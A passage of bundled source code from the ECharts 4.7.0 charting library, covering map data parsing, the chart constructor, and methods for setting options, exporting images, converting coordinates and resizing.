rawGeoJson.geoJson;\n            }\n            records = [{\n                type: 'geoJSON',\n                source: rawGeoJson,\n                specialAreas: rawSpecialAreas\n            }];\n        }\n\n        each$1(records, function (record) {\n            var type = record.type;\n            type === 'geoJson' && (type = record.type = 'geoJSON');\n\n            var parse = parsers[type];\n\n            if (__DEV__) {\n                assert$1(parse, 'Illegal map type: ' + type);\n            }\n\n            parse(record);\n        });\n\n        return storage.set(mapName, records);\n    },\n\n    retrieveMap: function (mapName) {\n        return storage.get(mapName);\n    }\n\n};\n\nvar parsers = {\n\n    geoJSON: function (record) {\n        var source = record.source;\n        record.geoJSON = !isString(source)\n            ? source\n            : (typeof JSON !== 'undefined' && JSON.parse)\n            ? JSON.parse(source)\n            : (new Function('return (' + source + ');'))();\n    },\n\n    // Only perform parse to XML object here, which might be time\n    // consiming for large SVG.\n    // Although convert XML to zrender element is also time consiming,\n    // if we do it here, the clone of zrender elements has to be\n    // required. So we do it once for each geo instance, util real\n    // performance issues call for optimizing it.\n    svg: function (record) {\n        record.svgXML = parseXML(record.source);\n    }\n\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\nvar assert = assert$1;\nvar each = each$1;\nvar isFunction = isFunction$1;\nvar isObject = isObject$1;\nvar parseClassType = ComponentModel.parseClassType;\n\nvar version = '4.7.0';\n\nvar dependencies = {\n    zrender: '4.3.0'\n};\n\nvar TEST_FRAME_REMAIN_TIME = 1;\n\nvar PRIORITY_PROCESSOR_FILTER = 1000;\nvar PRIORITY_PROCESSOR_SERIES_FILTER = 800;\nvar PRIORITY_PROCESSOR_DATASTACK = 900;\nvar PRIORITY_PROCESSOR_STATISTIC = 5000;\n\nvar PRIORITY_VISUAL_LAYOUT = 1000;\nvar PRIORITY_VISUAL_PROGRESSIVE_LAYOUT = 1100;\nvar PRIORITY_VISUAL_GLOBAL = 2000;\nvar PRIORITY_VISUAL_CHART = 3000;\nvar PRIORITY_VISUAL_POST_CHART_LAYOUT = 3500;\nvar PRIORITY_VISUAL_COMPONENT = 4000;\n// FIXME\n// necessary?\nvar PRIORITY_VISUAL_BRUSH = 5000;\n\nvar PRIORITY = {\n    PROCESSOR: {\n        FILTER: PRIORITY_PROCESSOR_FILTER,\n        SERIES_FILTER: PRIORITY_PROCESSOR_SERIES_FILTER,\n        STATISTIC: PRIORITY_PROCESSOR_STATISTIC\n    },\n    VISUAL: {\n        LAYOUT: PRIORITY_VISUAL_LAYOUT,\n        PROGRESSIVE_LAYOUT: PRIORITY_VISUAL_PROGRESSIVE_LAYOUT,\n        GLOBAL: PRIORITY_VISUAL_GLOBAL,\n        CHART: PRIORITY_VISUAL_CHART,\n        POST_CHART_LAYOUT: PRIORITY_VISUAL_POST_CHART_LAYOUT,\n        COMPONENT: PRIORITY_VISUAL_COMPONENT,\n        BRUSH: PRIORITY_VISUAL_BRUSH\n    }\n};\n\n// Main process have three entries: `setOption`, `dispatchAction` and `resize`,\n// where they must not be invoked nestedly, except the only case: invoke\n// dispatchAction with updateMethod \"none\" in main process.\n// This flag is used to carry out this rule.\n// All events will be triggered out side main process (i.e. when !this[IN_MAIN_PROCESS]).\nvar IN_MAIN_PROCESS = '__flagInMainProcess';\nvar OPTION_UPDATED = '__optionUpdated';\nvar ACTION_REG = /^[a-zA-Z0-9_]+$/;\n\n\nfunction createRegisterEventWithLowercaseName(method, ignoreDisposed) {\n    return function (eventName, handler, context) {\n        if (!ignoreDisposed && this._disposed) {\n            disposedWarning(this.id);\n            return;\n        }\n\n        // Event name is all lowercase\n        eventName = eventName && eventName.toLowerCase();\n        Eventful.prototype[method].call(this, eventName, handler, context);\n    };\n}\n\n/**\n * @module echarts~MessageCenter\n */\nfunction MessageCenter() {\n    Eventful.call(this);\n}\nMessageCenter.prototype.on = createRegisterEventWithLowercaseName('on', true);\nMessageCenter.prototype.off = createRegisterEventWithLowercaseName('off', true);\nMessageCenter.prototype.one = createRegisterEventWithLowercaseName('one', true);\nmixin(MessageCenter, Eventful);\n\n/**\n * @module echarts~ECharts\n */\nfunction ECharts(dom, theme$$1, opts) {\n    opts = opts || {};\n\n    // Get theme by name\n    if (typeof theme$$1 === 'string') {\n        theme$$1 = themeStorage[theme$$1];\n    }\n\n    /**\n     * @type {string}\n     */\n    this.id;\n\n    /**\n     * Group id\n     * @type {string}\n     */\n    this.group;\n\n    /**\n     * @type {HTMLElement}\n     * @private\n     */\n    this._dom = dom;\n\n    var defaultRenderer = 'canvas';\n    if (__DEV__) {\n        defaultRenderer = (\n            typeof window === 'undefined' ? global : window\n        ).__ECHARTS__DEFAULT__RENDERER__ || defaultRenderer;\n    }\n\n    /**\n     * @type {module:zrender/ZRender}\n     * @private\n     */\n    var zr = this._zr = init$1(dom, {\n        renderer: opts.renderer || defaultRenderer,\n        devicePixelRatio: opts.devicePixelRatio,\n        width: opts.width,\n        height: opts.height\n    });\n\n    /**\n     * Expect 60 fps.\n     * @type {Function}\n     * @private\n     */\n    this._throttledZrFlush = throttle(bind(zr.flush, zr), 17);\n\n    var theme$$1 = clone(theme$$1);\n    theme$$1 && backwardCompat(theme$$1, true);\n    /**\n     * @type {Object}\n     * @private\n     */\n    this._theme = theme$$1;\n\n    /**\n     * @type {Array.<module:echarts/view/Chart>}\n     * @private\n     */\n    this._chartsViews = [];\n\n    /**\n     * @type {Object.<string, module:echarts/view/Chart>}\n     * @private\n     */\n    this._chartsMap = {};\n\n    /**\n     * @type {Array.<module:echarts/view/Component>}\n     * @private\n     */\n    this._componentsViews = [];\n\n    /**\n     * @type {Object.<string, module:echarts/view/Component>}\n     * @private\n     */\n    this._componentsMap = {};\n\n    /**\n     * @type {module:echarts/CoordinateSystem}\n     * @private\n     */\n    this._coordSysMgr = new CoordinateSystemManager();\n\n    /**\n     * @type {module:echarts/ExtensionAPI}\n     * @private\n     */\n    var api = this._api = createExtensionAPI(this);\n\n    // Sort on demand\n    function prioritySortFunc(a, b) {\n        return a.__prio - b.__prio;\n    }\n    sort(visualFuncs, prioritySortFunc);\n    sort(dataProcessorFuncs, prioritySortFunc);\n\n    /**\n     * @type {module:echarts/stream/Scheduler}\n     */\n    this._scheduler = new Scheduler(this, api, dataProcessorFuncs, visualFuncs);\n\n    Eventful.call(this, this._ecEventProcessor = new EventProcessor());\n\n    /**\n     * @type {module:echarts~MessageCenter}\n     * @private\n     */\n    this._messageCenter = new MessageCenter();\n\n    // Init mouse events\n    this._initEvents();\n\n    // In case some people write `window.onresize = chart.resize`\n    this.resize = bind(this.resize, this);\n\n    // Can't dispatch action during rendering procedure\n    this._pendingActions = [];\n\n    zr.animation.on('frame', this._onframe, this);\n\n    bindRenderedEvent(zr, this);\n\n    // ECharts instance can be used as value.\n    setAsPrimitive(this);\n}\n\nvar echartsProto = ECharts.prototype;\n\nechartsProto._onframe = function () {\n    if (this._disposed) {\n        return;\n    }\n\n    var scheduler = this._scheduler;\n\n    // Lazy update\n    if (this[OPTION_UPDATED]) {\n        var silent = this[OPTION_UPDATED].silent;\n\n        this[IN_MAIN_PROCESS] = true;\n\n        prepare(this);\n        updateMethods.update.call(this);\n\n        this[IN_MAIN_PROCESS] = false;\n\n        this[OPTION_UPDATED] = false;\n\n        flushPendingActions.call(this, silent);\n\n        triggerUpdatedEvent.call(this, silent);\n    }\n    // Avoid do both lazy update and progress in one frame.\n    else if (scheduler.unfinished) {\n        // Stream progress.\n        var remainTime = TEST_FRAME_REMAIN_TIME;\n        var ecModel = this._model;\n        var api = this._api;\n        scheduler.unfinished = false;\n        do {\n            var startTime = +new Date();\n\n            scheduler.performSeriesTasks(ecModel);\n\n            // Currently dataProcessorFuncs do not check threshold.\n            scheduler.performDataProcessorTasks(ecModel);\n\n            updateStreamModes(this, ecModel);\n\n            // Do not update coordinate system here. Because that coord system update in\n            // each frame is not a good user experience. So we follow the rule that\n            // the extent of the coordinate system is determin in the first frame (the\n            // frame is executed immedietely after task reset.\n            // this._coordSysMgr.update(ecModel, api);\n\n            // console.log('--- ec frame visual ---', remainTime);\n            scheduler.performVisualTasks(ecModel);\n\n            renderSeries(this, this._model, api, 'remain');\n\n            remainTime -= (+new Date() - startTime);\n        }\n        while (remainTime > 0 && scheduler.unfinished);\n\n        // Call flush explicitly for trigger finished event.\n        if (!scheduler.unfinished) {\n            this._zr.flush();\n        }\n        // Else, zr flushing be ensue within the same frame,\n        // because zr flushing is after onframe event.\n    }\n};\n\n/**\n * @return {HTMLElement}\n */\nechartsProto.getDom = function () {\n    return this._dom;\n};\n\n/**\n * @return {module:zrender~ZRender}\n */\nechartsProto.getZr = function () {\n    return this._zr;\n};\n\n/**\n * Usage:\n * chart.setOption(option, notMerge, lazyUpdate);\n * chart.setOption(option, {\n *     notMerge: ...,\n *     lazyUpdate: ...,\n *     silent: ...\n * });\n *\n * @param {Object} option\n * @param {Object|boolean} [opts] opts or notMerge.\n * @param {boolean} [opts.notMerge=false]\n * @param {boolean} [opts.lazyUpdate=false] Useful when setOption frequently.\n */\nechartsProto.setOption = function (option, notMerge, lazyUpdate) {\n    if (__DEV__) {\n        assert(!this[IN_MAIN_PROCESS], '`setOption` should not be called during main process.');\n    }\n    if (this._disposed) {\n        disposedWarning(this.id);\n        return;\n    }\n\n    var silent;\n    if (isObject(notMerge)) {\n        lazyUpdate = notMerge.lazyUpdate;\n        silent = notMerge.silent;\n        notMerge = notMerge.notMerge;\n    }\n\n    this[IN_MAIN_PROCESS] = true;\n\n    if (!this._model || notMerge) {\n        var optionManager = new OptionManager(this._api);\n        var theme$$1 = this._theme;\n        var ecModel = this._model = new GlobalModel();\n        ecModel.scheduler = this._scheduler;\n        ecModel.init(null, null, theme$$1, optionManager);\n    }\n\n    this._model.setOption(option, optionPreprocessorFuncs);\n\n    if (lazyUpdate) {\n        this[OPTION_UPDATED] = {silent: silent};\n        this[IN_MAIN_PROCESS] = false;\n    }\n    else {\n        prepare(this);\n\n        updateMethods.update.call(this);\n\n        // Ensure zr refresh sychronously, and then pixel in canvas can be\n        // fetched after `setOption`.\n        this._zr.flush();\n\n        this[OPTION_UPDATED] = false;\n        this[IN_MAIN_PROCESS] = false;\n\n        flushPendingActions.call(this, silent);\n        triggerUpdatedEvent.call(this, silent);\n    }\n};\n\n/**\n * @DEPRECATED\n */\nechartsProto.setTheme = function () {\n    console.error('ECharts#setTheme() is DEPRECATED in ECharts 3.0');\n};\n\n/**\n * @return {module:echarts/model/Global}\n */\nechartsProto.getModel = function () {\n    return this._model;\n};\n\n/**\n * @return {Object}\n */\nechartsProto.getOption = function () {\n    return this._model && this._model.getOption();\n};\n\n/**\n * @return {number}\n */\nechartsProto.getWidth = function () {\n    return this._zr.getWidth();\n};\n\n/**\n * @return {number}\n */\nechartsProto.getHeight = function () {\n    return this._zr.getHeight();\n};\n\n/**\n * @return {number}\n */\nechartsProto.getDevicePixelRatio = function () {\n    return this._zr.painter.dpr || window.devicePixelRatio || 1;\n};\n\n/**\n * Get canvas which has all thing rendered\n * @param {Object} opts\n * @param {string} [opts.backgroundColor]\n * @return {string}\n */\nechartsProto.getRenderedCanvas = function (opts) {\n    if (!env$1.canvasSupported) {\n        return;\n    }\n    opts = opts || {};\n    opts.pixelRatio = opts.pixelRatio || 1;\n    opts.backgroundColor = opts.backgroundColor\n        || this._model.get('backgroundColor');\n    var zr = this._zr;\n    // var list = zr.storage.getDisplayList();\n    // Stop animations\n    // Never works before in init animation, so remove it.\n    // zrUtil.each(list, function (el) {\n    //     el.stopAnimation(true);\n    // });\n    return zr.painter.getRenderedCanvas(opts);\n};\n\n/**\n * Get svg data url\n * @return {string}\n */\nechartsProto.getSvgDataUrl = function () {\n    if (!env$1.svgSupported) {\n        return;\n    }\n\n    var zr = this._zr;\n    var list = zr.storage.getDisplayList();\n    // Stop animations\n    each$1(list, function (el) {\n        el.stopAnimation(true);\n    });\n\n    return zr.painter.pathToDataUrl();\n};\n\n/**\n * @return {string}\n * @param {Object} opts\n * @param {string} [opts.type='png']\n * @param {string} [opts.pixelRatio=1]\n * @param {string} [opts.backgroundColor]\n * @param {string} [opts.excludeComponents]\n */\nechartsProto.getDataURL = function (opts) {\n    if (this._disposed) {\n        disposedWarning(this.id);\n        return;\n    }\n\n    opts = opts || {};\n    var excludeComponents = opts.excludeComponents;\n    var ecModel = this._model;\n    var excludesComponentViews = [];\n    var self = this;\n\n    each(excludeComponents, function (componentType) {\n        ecModel.eachComponent({\n            mainType: componentType\n        }, function (component) {\n            var view = self._componentsMap[component.__viewId];\n            if (!view.group.ignore) {\n                excludesComponentViews.push(view);\n                view.group.ignore = true;\n            }\n        });\n    });\n\n    var url = this._zr.painter.getType() === 'svg'\n        ? this.getSvgDataUrl()\n        : this.getRenderedCanvas(opts).toDataURL(\n            'image/' + (opts && opts.type || 'png')\n        );\n\n    each(excludesComponentViews, function (view) {\n        view.group.ignore = false;\n    });\n\n    return url;\n};\n\n\n/**\n * @return {string}\n * @param {Object} opts\n * @param {string} [opts.type='png']\n * @param {string} [opts.pixelRatio=1]\n * @param {string} [opts.backgroundColor]\n */\nechartsProto.getConnectedDataURL = function (opts) {\n    if (this._disposed) {\n        disposedWarning(this.id);\n        return;\n    }\n\n    if (!env$1.canvasSupported) {\n        return;\n    }\n    var groupId = this.group;\n    var mathMin = Math.min;\n    var mathMax = Math.max;\n    var MAX_NUMBER = Infinity;\n    if (connectedGroups[groupId]) {\n        var left = MAX_NUMBER;\n        var top = MAX_NUMBER;\n        var right = -MAX_NUMBER;\n        var bottom = -MAX_NUMBER;\n        var canvasList = [];\n        var dpr = (opts && opts.pixelRatio) || 1;\n\n        each$1(instances, function (chart, id) {\n            if (chart.group === groupId) {\n                var canvas = chart.getRenderedCanvas(\n                    clone(opts)\n                );\n                var boundingRect = chart.getDom().getBoundingClientRect();\n                left = mathMin(boundingRect.left, left);\n                top = mathMin(boundingRect.top, top);\n                right = mathMax(boundingRect.right, right);\n                bottom = mathMax(boundingRect.bottom, bottom);\n                canvasList.push({\n                    dom: canvas,\n                    left: boundingRect.left,\n                    top: boundingRect.top\n                });\n            }\n        });\n\n        left *= dpr;\n        top *= dpr;\n        right *= dpr;\n        bottom *= dpr;\n        var width = right - left;\n        var height = bottom - top;\n        var targetCanvas = createCanvas();\n        targetCanvas.width = width;\n        targetCanvas.height = height;\n        var zr = init$1(targetCanvas);\n\n        // Background between the charts\n        if (opts.connectedBackgroundColor) {\n            zr.add(new Rect({\n                shape: {\n                    x: 0,\n                    y: 0,\n                    width: width,\n                    height: height\n                },\n                style: {\n                    fill: opts.connectedBackgroundColor\n                }\n            }));\n        }\n\n        each(canvasList, function (item) {\n            var img = new ZImage({\n                style: {\n                    x: item.left * dpr - left,\n                    y: item.top * dpr - top,\n                    image: item.dom\n                }\n            });\n            zr.add(img);\n        });\n        zr.refreshImmediately();\n\n        return targetCanvas.toDataURL('image/' + (opts && opts.type || 'png'));\n    }\n    else {\n        return this.getDataURL(opts);\n    }\n};\n\n/**\n * Convert from logical coordinate system to pixel coordinate system.\n * See CoordinateSystem#convertToPixel.\n * @param {string|Object} finder\n *        If string, e.g., 'geo', means {geoIndex: 0}.\n *        If Object, could contain some of these properties below:\n *        {\n *            seriesIndex / seriesId / seriesName,\n *            geoIndex / geoId, geoName,\n *            bmapIndex / bmapId / bmapName,\n *            xAxisIndex / xAxisId / xAxisName,\n *            yAxisIndex / yAxisId / yAxisName,\n *            gridIndex / gridId / gridName,\n *            ... (can be extended)\n *        }\n * @param {Array|number} value\n * @return {Array|number} result\n */\nechartsProto.convertToPixel = curry(doConvertPixel, 'convertToPixel');\n\n/**\n * Convert from pixel coordinate system to logical coordinate system.\n * See CoordinateSystem#convertFromPixel.\n * @param {string|Object} finder\n *        If string, e.g., 'geo', means {geoIndex: 0}.\n *        If Object, could contain some of these properties below:\n *        {\n *            seriesIndex / seriesId / seriesName,\n *            geoIndex / geoId / geoName,\n *            bmapIndex / bmapId / bmapName,\n *            xAxisIndex / xAxisId / xAxisName,\n *            yAxisIndex / yAxisId / yAxisName\n *            gridIndex / gridId / gridName,\n *            ... (can be extended)\n *        }\n * @param {Array|number} value\n * @return {Array|number} result\n */\nechartsProto.convertFromPixel = curry(doConvertPixel, 'convertFromPixel');\n\nfunction doConvertPixel(methodName, finder, value) {\n    if (this._disposed) {\n        disposedWarning(this.id);\n        return;\n    }\n\n    var ecModel = this._model;\n    var coordSysList = this._coordSysMgr.getCoordinateSystems();\n    var result;\n\n    finder = parseFinder(ecModel, finder);\n\n    for (var i = 0; i < coordSysList.length; i++) {\n        var coordSys = coordSysList[i];\n        if (coordSys[methodName]\n            && (result = coordSys[methodName](ecModel, finder, value)) != null\n        ) {\n            return result;\n        }\n    }\n\n    if (__DEV__) {\n        console.warn(\n            'No coordinate system that supports ' + methodName + ' found by the given finder.'\n        );\n    }\n}\n\n/**\n * Is the specified coordinate systems or components contain the given pixel point.\n * @param {string|Object} finder\n *        If string, e.g., 'geo', means {geoIndex: 0}.\n *        If Object, could contain some of these properties below:\n *        {\n *            seriesIndex / seriesId / seriesName,\n *            geoIndex / geoId / geoName,\n *            bmapIndex / bmapId / bmapName,\n *            xAxisIndex / xAxisId / xAxisName,\n *            yAxisIndex / yAxisId / yAxisName,\n *            gridIndex / gridId / gridName,\n *            ... (can be extended)\n *        }\n * @param {Array|number} value\n * @return {boolean} result\n */\nechartsProto.containPixel = function (finder, value) {\n    if (this._disposed) {\n        disposedWarning(this.id);\n        return;\n    }\n\n    var ecModel = this._model;\n    var result;\n\n    finder = parseFinder(ecModel, finder);\n\n    each$1(finder, function (models, key) {\n        key.indexOf('Models') >= 0 && each$1(models, function (model) {\n            var coordSys = model.coordinateSystem;\n            if (coordSys && coordSys.containPoint) {\n                result |= !!coordSys.containPoint(value);\n            }\n            else if (key === 'seriesModels') {\n                var view = this._chartsMap[model.__viewId];\n                if (view && view.containPoint) {\n                    result |= view.containPoint(value, model);\n                }\n                else {\n                    if (__DEV__) {\n                        console.warn(key + ': ' + (view\n                            ? 'The found component do not support containPoint.'\n                            : 'No view mapping to the found component.'\n                        ));\n                    }\n                }\n            }\n            else {\n                if (__DEV__) {\n                    console.warn(key + ': containPoint is not supported');\n                }\n            }\n        }, this);\n    }, this);\n\n    return !!result;\n};\n\n/**\n * Get visual from series or data.\n * @param {string|Object} finder\n *        If string, e.g., 'series', means {seriesIndex: 0}.\n *        If Object, could contain some of these properties below:\n *        {\n *            seriesIndex / seriesId / seriesName,\n *            dataIndex / dataIndexInside\n *        }\n *        If dataIndex is not specified, series visual will be fetched,\n *        but not data item visual.\n *        If all of seriesIndex, seriesId, seriesName are not specified,\n *        visual will be fetched from first series.\n * @param {string} visualType 'color', 'symbol', 'symbolSize'\n */\nechartsProto.getVisual = function (finder, visualType) {\n    var ecModel = this._model;\n\n    finder = parseFinder(ecModel, finder, {defaultMainType: 'series'});\n\n    var seriesModel = finder.seriesModel;\n\n    if (__DEV__) {\n        if (!seriesModel) {\n            console.warn('There is no specified seires model');\n        }\n    }\n\n    var data = seriesModel.getData();\n\n    var dataIndexInside = finder.hasOwnProperty('dataIndexInside')\n        ? finder.dataIndexInside\n        : finder.hasOwnProperty('dataIndex')\n        ? data.indexOfRawIndex(finder.dataIndex)\n        : null;\n\n    return dataIndexInside != null\n        ? data.getItemVisual(dataIndexInside, visualType)\n        : data.getVisual(visualType);\n};\n\n/**\n * Get view of corresponding component model\n * @param  {module:echarts/model/Component} componentModel\n * @return {module:echarts/view/Component}\n */\nechartsProto.getViewOfComponentModel = function (componentModel) {\n    return this._componentsMap[componentModel.__viewId];\n};\n\n/**\n * Get view of corresponding series model\n * @param  {module:echarts/model/Series} seriesModel\n * @return {module:echarts/view/Chart}\n */\nechartsProto.getViewOfSeriesModel = function (seriesModel) {\n    return this._chartsMap[seriesModel.__viewId];\n};\n\nvar updateMethods = {\n\n    prepareAndUpdate: function (payload) {\n        prepare(this);\n        updateMethods.update.call(this, payload);\n    },\n\n    /**\n     * @param {Object} payload\n     * @private\n     */\n    update: function (payload) {\n        // console.profile && console.profile('update');\n\n        var ecModel = this._model;\n        var api = this._api;\n        var zr = this._zr;\n        var coordSysMgr = this._coordSysMgr;\n        var scheduler = this._scheduler;\n\n        // update before setOption\n        if (!ecModel) {\n            return;\n        }\n\n        scheduler.restoreData(ecModel, payload);\n\n        scheduler.performSeriesTasks(ecModel);\n\n        // TODO\n        // Save total ecModel here for undo/redo (after restoring data and before processing data).\n        // Undo (restoration of total ecModel) can be carried out in 'action' or outside API call.\n\n        // Create new coordinate system each update\n        // In LineView may save the old coordinate system and use it to get the orignal point\n        coordSysMgr.create(ecModel, api);\n\n        scheduler.performDataProcessorTasks(ecModel, payload);\n\n        // Current stream render is not supported in data process. So we can update\n        // stream modes after data processing, where the filtered data is used to\n        // deteming whether use progressive rendering.\n        updateStreamModes(this, ecModel);\n\n        // We update stream modes before coordinate system updated, then the modes info\n        // can be fetched when coord sys updating (consider the barGrid extent fix). But\n        // the drawback is the full coord info can not be fetched. Fortunately this full\n        // coord is not requied in stream mode updater currently.\n        coordSysMgr.update(ecModel, api);\n\n        clearColorPalette(ecModel);\n        scheduler.performVisualTasks(ecModel, payload);\n\n        render(this, ecModel, api, payload);\n\n        // Set background\n        var backgroundColor = ecModel.get('backgroundColor') || 'transparent';\n\n        // In IE8\n        if (!env$1.canvasSupported) {\n            var colorArr = parse(backgroundColor);\n            backgroundColor = stringify(colorArr, 'rgb');\n            if (colorArr[3] === 0) {\n                backgroundColor = 'transparent';\n            }\n        }\n        else {\n            zr.setBackgroundColor(backgroundColor);\n        }\n\n        performPostUpdateFuncs(ecModel, api);\n\n        // console.profile && console.profileEnd('update');\n    },\n\n    /**\n     * @param {Object} payload\n     * @private\n     */\n    updateTransform: function (payload) {\n        var ecModel = this._model;\n        var ecIns = this;\n        var api = this._api;\n\n        // update before setOption\n        if (!ecModel) {\n            return;\n        }\n\n        // ChartView.markUpdateMethod(payload, 'updateTransform');\n\n        var componentDirtyList = [];\n        ecModel.eachComponent(function (componentType, componentModel) {\n            var componentView = ecIns.getViewOfComponentModel(componentModel);\n            if (componentView && componentView.__alive) {\n                if (componentView.updateTransform) {\n                    var result = componentView.updateTransform(componentModel, ecModel, api, payload);\n                    result && result.update && componentDirtyList.push(componentView);\n                }\n                else {\n                    componentDirtyList.push(componentView);\n                }\n            }\n        });\n\n        var seriesDirtyMap = createHashMap();\n        ecModel.eachSeries(function (seriesModel) {\n            var chartView = ecIns._chartsMap[seriesModel.__viewId];\n            if (chartView.updateTransform) {\n                var result = chartView.updateTransform(seriesModel, ecModel, api, payload);\n                result && result.update && seriesDirtyMap.set(seriesModel.uid, 1);\n            }\n            else {\n                seriesDirtyMap.set(seriesModel.uid, 1);\n            }\n        });\n\n        clearColorPalette(ecModel);\n        // Keep pipe to the exist pipeline because it depends on the render task of the full pipeline.\n        // this._scheduler.performVisualTasks(ecModel, payload, 'layout', true);\n        this._scheduler.performVisualTasks(\n            ecModel, payload, {setDirty: true, dirtyMap: seriesDirtyMap}\n        );\n\n        // Currently, not call render of components. Geo render cost a lot.\n        // renderComponents(ecIns, ecModel, api, payload, componentDirtyList);\n        renderSeries(ecIns, ecModel, api, payload, seriesDirtyMap);\n\n        performPostUpdateFuncs(ecModel, this._api);\n    },\n\n    /**\n     * @param {Object} payload\n     * @private\n     */\n    updateView: function (payload) {\n        var ecModel = this._model;\n\n        // update before setOption\n        if (!ecModel) {\n            return;\n        }\n\n        Chart.markUpdateMethod(payload, 'updateView');\n\n        clearColorPalette(ecModel);\n\n        // Keep pipe to the exist pipeline because it depends on the render task of the full pipeline.\n        this._scheduler.performVisualTasks(ecModel, payload, {setDirty: true});\n\n        render(this, this._model, this._api, payload);\n\n        performPostUpdateFuncs(ecModel, this._api);\n    },\n\n    /**\n     * @param {Object} payload\n     * @private\n     */\n    updateVisual: function (payload) {\n        updateMethods.update.call(this, payload);\n\n        // var ecModel = this._model;\n\n        // // update before setOption\n        // if (!ecModel) {\n        //     return;\n        // }\n\n        // ChartView.markUpdateMethod(payload, 'updateVisual');\n\n        // clearColorPalette(ecModel);\n\n        // // Keep pipe to the exist pipeline because it depends on the render task of the full pipeline.\n        // this._scheduler.performVisualTasks(ecModel, payload, {visualType: 'visual', setDirty: true});\n\n        // render(this, this._model, this._api, payload);\n\n        // performPostUpdateFuncs(ecModel, this._api);\n    },\n\n    /**\n     * @param {Object} payload\n     * @private\n     */\n    updateLayout: function (payload) {\n        updateMethods.update.call(this, payload);\n\n        // var ecModel = this._model;\n\n        // // update before setOption\n        // if (!ecModel) {\n        //     return;\n        // }\n\n        // ChartView.markUpdateMethod(payload, 'updateLayout');\n\n        // // Keep pipe to the exist pipeline because it depends on the render task of the full pipeline.\n        // // this._scheduler.performVisualTasks(ecModel, payload, 'layout', true);\n        // this._scheduler.performVisualTasks(ecModel, payload, {setDirty: true});\n\n        // render(this, this._model, this._api, payload);\n\n        // performPostUpdateFuncs(ecModel, this._api);\n    }\n};\n\nfunction prepare(ecIns) {\n    var ecModel = ecIns._model;\n    var scheduler = ecIns._scheduler;\n\n    scheduler.restorePipelines(ecModel);\n\n    scheduler.prepareStageTasks();\n\n    prepareView(ecIns, 'component', ecModel, scheduler);\n\n    prepareView(ecIns, 'chart', ecModel, scheduler);\n\n    scheduler.plan();\n}\n\n/**\n * @private\n */\nfunction updateDirectly(ecIns, method, payload, mainType, subType) {\n    var ecModel = ecIns._model;\n\n    // broadcast\n    if (!mainType) {\n        // FIXME\n        // Chart will not be update directly here, except set dirty.\n        // But there is no such scenario now.\n        each(ecIns._componentsViews.concat(ecIns._chartsViews), callView);\n        return;\n    }\n\n    var query = {};\n    query[mainType + 'Id'] = payload[mainType + 'Id'];\n    query[mainType + 'Index'] = payload[mainType + 'Index'];\n    query[mainType + 'Name'] = payload[mainType + 'Name'];\n\n    var condition = {mainType: mainType, query: query};\n    subType && (condition.subType = subType); // subType may be '' by parseClassType;\n\n    var excludeSeriesId = payload.excludeSeriesId;\n    if (excludeSeriesId != null) {\n        excludeSeriesId = createHashMap(normalizeToArray(excludeSeriesId));\n    }\n\n    // If dispatchAction before setOption, do nothing.\n    ecModel && ecModel.eachComponent(condition, function (model) {\n        if (!excludeSeriesId || excludeSeriesId.get(model.id) == null) {\n            callView(ecIns[\n                mainType === 'series' ? '_chartsMap' : '_componentsMap'\n            ][model.__viewId]);\n        }\n    }, ecIns);\n\n    function callView(view) {\n        view && view.__alive && view[method] && view[method](\n            view.__model, ecModel, ecIns._api, payload\n        );\n    }\n}\n\n/**\n * Resize the chart\n * @param {Object} opts\n * @param {number} [opts.width] Can be 'auto' (the same as null/undefined)\n * @param {number} [opts.height] Can be 'auto' (the same as null/undefined)\n * @param {boolean} [opts.silent=false]\n */\nechartsProto.resize = function (opts) {\n    if (__DEV__) {\n        assert(!this[IN_MAIN_PROCESS], '`resize` should not be called during main process.');\n    }\n    if (this._disposed) {\n        disposedWarning(this.id);\n        return;\n    }\n\n    this._zr.resize(opts);\n\n    var ecModel = this._model;\n\n    // Resize loading effect\n    this._loadingFX && this._loadingFX.resize();\n\n    if (!ecModel) {\n        return;\n    }\n\n    var optionChanged = ecModel.resetOption('media');\n\n    var silent = opts && opts.silent;\n\n    this[IN_MAIN_PROCESS] = true;\n\n    optionChanged && prepare(this);\n    updateMethods.update.call(this);\n\n    this[IN_MAIN_PROCESS] = false;\n\n    flushPendingActions.call(this, silent);\n\n    triggerUpdatedEvent.call(this, silent);\n};\n\nfunction updateStreamModes(ecIns, ecModel) {\n    var chartsMap = ecIns._chartsMap;\n    var scheduler = ecIns._scheduler;\n    ecModel.eachSeries(function (seriesModel) {\n        scheduler.updateStreamModes(seriesModel, chartsMap[seriesModel.__viewId]);\n    });\n}\n\n/**\n * Show loading effect\n * @param  {string} [name='default']\n * @param  {Object} [cfg]\n */\nechartsProto.showLoading = function (name, cfg) {\n    if (this._disposed) {\n        disposedWarning(this.id);\n        return;\n    }\n\n    if (isObject(name)) {\n        cfg = name;\n        name = '';\n    }\n    name = name || 'default';\n\n    this.hideLoading();\n    if (!loadingEffects[name]) {\n        if (__DEV__) {\n            console.warn('Loading effects ' + name + ' not exists.');\n        }\n        return;\n    }\n    var el = loadingEffects[name](this._api, cfg);\n    var zr = this._zr;\n    this._loadingFX = el;\n\n    zr.add(el);\n};\n\n/**\n * Hide loading effect\n */\nechartsProto.hideLoading = function () {\n    if (this._disposed) {\n        disposedWarning(this.id);\n        return;\n    }\n\n    this._loadingFX && this._zr.remove(this._loadingFX);\n    this._loadingFX = null;\n};\n\n/**\n * @param {Object} eventObj\n * @return {Object}\n */\nechartsProto.makeActionFromEvent = function (eventObj) {\n    var payload = extend({}, eventObj);\n    payload.type = eventActionMap[eventObj.type];\n    return payload;\n};\n\n/**\n * @pubilc\n * @param {Object} payload\n * @param {string} [payload.type] Action type\n * @param {Object|boolean} [opt] If pass boolean, means opt.silent\n * @param {boolean} [opt.silent=false] Whether trigger events.\n * @param {boolean} [opt.flush=undefined]\n *                  true: Flush immediately, and then pixel in canvas can be fetched\n *                      immediately. Caution: it might affect performance.\n *                  false: Not flush.\n *                  undefined: Auto decide whether perform flush.\n */\nechartsProto.dispatchAction = function (payload, opt) {\n    if (this._disposed) {\n        